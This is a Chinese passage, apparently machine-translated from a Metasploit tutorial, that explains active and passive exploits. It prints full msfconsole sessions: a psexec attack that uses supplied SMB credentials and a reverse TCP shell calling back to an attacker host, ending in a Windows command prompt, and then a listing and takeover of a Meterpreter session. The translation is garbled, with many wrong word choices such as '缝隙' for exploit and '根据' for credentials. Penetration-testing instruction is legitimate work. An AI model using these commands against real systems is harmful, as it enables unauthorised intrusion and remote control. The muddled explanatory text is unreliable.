标签：

主动缝隙将操作特定的主机，运行直至完成，然撤退退却出。

“Brute-force（暴力）”模块将在受害者打开外壳时退出。

如果遇到错误，模块执行将遏制。

您可以通过将‘-j‘通报给exploit命令来强制勾当模块进入后台：

msf exploit(ms08_067_netapi) > exploit -j [*] Exploit running as background job 0. msf exploit(ms08_067_netapi) >

例子：

以下示例操作先前获取的一组根据来操作并获得方针系统上的反向shell。

msf > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 192.168.1.100 RHOST => 192.168.1.100 msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp PAYLOAD => windows/shell/reverse_tcp msf exploit(psexec) > set LHOST 192.168.1.5 LHOST => 192.168.1.5 msf exploit(psexec) > set LPORT 4444 LPORT => 4444 msf exploit(psexec) > set SMBUSER victim SMBUSER => victim msf exploit(psexec) > set SMBPASS s3cr3t SMBPASS => s3cr3t msf exploit(psexec) > exploit [*] Connecting to the server... [*] Started reverse handler [*] Authenticating as user ‘victim‘... [*] Uploading payload... [*] Created \hikmEeEM.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting \hikmEeEM.exe... [*] Sending stage (240 bytes) [*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>

被动打击期待传入主机并在连接时操作它们。

被动打击几乎总是集中在诸如Web浏览器，FTP客户端等客户端上。

它们也可以与电子邮件缝隙操作一起使用，，期待连接。

被动打击呈报shell可以通过将‘-l‘通报给sessions命令来枚举。通报‘-i‘将与shell进行交互。

msf exploit(ani_loadimage_chunksize) > sessions -l Active sessions =============== Id Description Tunnel -- ----------- ------ 1 Meterpreter 192.168.1.5:52647 -> 192.168.1.100:4444 msf exploit(ani_loadimage_chunksize) > sessions -i 1 [*] Starting interaction with 1... meterpreter >

Metasploit 使用Exploits（缝隙）